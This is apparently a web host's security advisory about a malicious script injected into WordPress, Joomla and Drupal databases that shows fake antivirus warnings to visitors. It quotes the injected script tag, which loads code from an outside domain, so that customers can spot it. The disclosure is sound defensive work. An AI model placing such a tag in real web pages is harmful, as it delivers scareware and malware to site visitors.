We want your feedback!

*Update: Our security team has identified WordPress®, Joomla® and Drupal® as the targeted content management systems. We are repairing affected databases and employing preventative measures to stop the attack.

We’ve identified a security issue that infected some databases used for content management systems including WordPress, Joomla and Drupal. We want to make sure that you are aware of the issue. We’re ready to help you fix it if you’re affected.

What’s happening: Attackers have injected a malicious script into individual customers’ databases. The script displays a warning that you have a virus, and offers to sell you antivirus software. Do not click any links on this window. Clicking the links installs malware on your computer. If you clicked on any of these links, you can uninstall the malware by using a free antivirus program, such as Microsoft® Security Essentials.

Diagnosing: You can find out if your database is affected by going to your blog’s control panel, opening a post’s HTML editor, and scrolling to the bottom. If you see this, you’re affected:

<script src=”http://acrossuniverseitbenet.com/js.php?kk=10″></script>

We’ll update this post if any other scripts are identified.

If you find that script, please visit https://www.godaddy.com/community/contactus.aspx?section=support and submit a ticket. Our security experts will help to remove the malware and return your database to order.

We take your security very seriously at Go Daddy. Our security team is working around the clock to quickly and efficiently resolve these issues.
